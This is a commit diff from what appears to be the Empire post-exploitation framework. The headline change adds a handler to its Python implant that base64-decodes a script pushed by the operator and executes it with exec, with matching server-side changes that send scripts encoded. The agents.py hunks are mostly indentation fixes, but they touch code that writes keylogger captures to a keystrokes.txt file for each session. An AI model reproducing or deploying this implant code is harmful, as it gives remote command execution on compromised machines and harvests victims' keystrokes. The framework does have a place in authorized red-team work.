Fixed pythonscript command in python agent

Conflicts:
	lib/common/empire.py

data/agent/agent.py

@@ -418,6 +418,21 @@ def process_packet(packetType, data, resultID):
         # TODO: implement job structure
         pass
 
+    elif packetType == 121:
+        #base64 decode the script and execute
+        script = base64.b64decode(data)
+        try:
+            buffer = StringIO()
+            sys.stdout = buffer
+            code_obj = compile(script, '<string>', 'exec')
+            exec code_obj in globals()
+            sys.stdout = sys.__stdout__
+            result = str(buffer.getvalue())
+            return build_response_packet(121, result, resultID)
+        except Exception as e:
+            errorData = str(buffer.getvalue())
+            return build_response_packet(0, "error executing specified Python data %s \nBuffer data recovered:\n%s" %(e, errorData), resultID)
+
     elif packetType == 122:
         #base64 decode and decompress the data
         try:

lib/common/agents.py

@@ -1343,19 +1343,19 @@ class Agents:
             if autorun and autorun[0] != '' and autorun[1] != '':
                 self.add_agent_task_db(sessionID, autorun[0], autorun[1])
 
-	    if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0:
+            if self.mainMenu.autoRuns.has_key(language.lower()) and len(self.mainMenu.autoRuns[language.lower()]) > 0:
-		autorunCmds = ["interact %s" % sessionID]
+                autorunCmds = ["interact %s" % sessionID]
-		autorunCmds.extend(self.mainMenu.autoRuns[language.lower()])
+                autorunCmds.extend(self.mainMenu.autoRuns[language.lower()])
-		autorunCmds.extend(["lastautoruncmd"])
+                autorunCmds.extend(["lastautoruncmd"])
-		self.mainMenu.resourceQueue.extend(autorunCmds)
+                self.mainMenu.resourceQueue.extend(autorunCmds)
-		try:
+                try:
-		    #this will cause the cmdloop() to start processing the autoruns
+                    #this will cause the cmdloop() to start processing the autoruns
-		    self.mainMenu.do_agents("kickit")
+                    self.mainMenu.do_agents("kickit")
-		except Exception as e:
+                except Exception as e:
-		    if e.message == "endautorun":
+                    if e.message == "endautorun":
-			pass
+                        pass
-		    else:
+                    else:
-		        raise e
+                        raise e
 
             return "STAGE2: %s" % (sessionID)
 
@@ -1509,7 +1509,7 @@ class Agents:
         """
 
         agentSessionID = sessionID
-	keyLogTaskID = None
+        keyLogTaskID = None
 
         # see if we were passed a name instead of an ID
         nameid = self.get_agent_id_db(sessionID)
@@ -1603,7 +1603,7 @@ class Agents:
 
         elif responseName == "TASK_EXIT":
             # exit command response
-	    data = "[!] Agent %s exiting" % (sessionID)
+            data = "[!] Agent %s exiting" % (sessionID)
             # let everyone know this agent exited
             dispatcher.send(data, sender='Agents')
 
@@ -1724,20 +1724,21 @@ class Agents:
         elif responseName == "TASK_CMD_JOB":
 	    #check if this is the powershell keylogging task, if so, write output to file instead of screen
             if keyLogTaskID and keyLogTaskID == taskID:
-            	safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath)
+                safePath = os.path.abspath("%sdownloads/" % self.mainMenu.installPath)
-		savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID)
+                savePath = "%sdownloads/%s/keystrokes.txt" % (self.mainMenu.installPath,sessionID)
-		if not os.path.abspath(savePath).startswith(safePath):
+                if not os.path.abspath(savePath).startswith(safePath):
                     dispatcher.send("[!] WARNING: agent %s attempted skywalker exploit!" % (self.sessionID), sender='Agents')
                     return
-		with open(savePath,"a+") as f:
+
-		    new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n")
+                with open(savePath,"a+") as f:
-		    f.write(new_results)
+                    new_results = data.replace("\r\n","").replace("[SpaceBar]", "").replace('\b', '').replace("[Shift]", "").replace("[Enter]\r","\r\n")
-	    else:
+                    f.write(new_results)
+            else:
                 # dynamic script output -> non-blocking
                 self.update_agent_results_db(sessionID, data)
 
-            # update the agent log
+                # update the agent log
-            self.save_agent_log(sessionID, data)
+                self.save_agent_log(sessionID, data)
 
             # TODO: redo this regex for really large AD dumps
             #   so a ton of data isn't kept in memory...?
@@ -1802,6 +1803,7 @@ class Agents:
             self.save_agent_log(sessionID, data)
 
         elif responseName == "TASK_SCRIPT_COMMAND":
+            
             self.update_agent_results_db(sessionID, data)
             # update the agent log
             self.save_agent_log(sessionID, data)

lib/common/empire.py

@@ -21,6 +21,9 @@ import hashlib
 import time
 import fnmatch
 import shlex
+import pkgutil
+import importlib
+import base64
 
 # Empire imports
 import helpers
@@ -2589,10 +2592,10 @@ class PythonAgentMenu(SubMenu):
             open_file.close()
             script = script.replace('\r\n', '\n')
             script = script.replace('\r', '\n')
-
+            encScript = base64.b64encode(script)
             msg = "[*] Tasked agent to execute python script: "+filename
             print helpers.color(msg, color="green")
-            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_CMD_WAIT", script)
+            self.mainMenu.agents.add_agent_task_db(self.sessionID, "TASK_SCRIPT_COMMAND", encScript)
             #update the agent log
             self.mainMenu.agents.save_agent_log(self.sessionID, msg)
         else: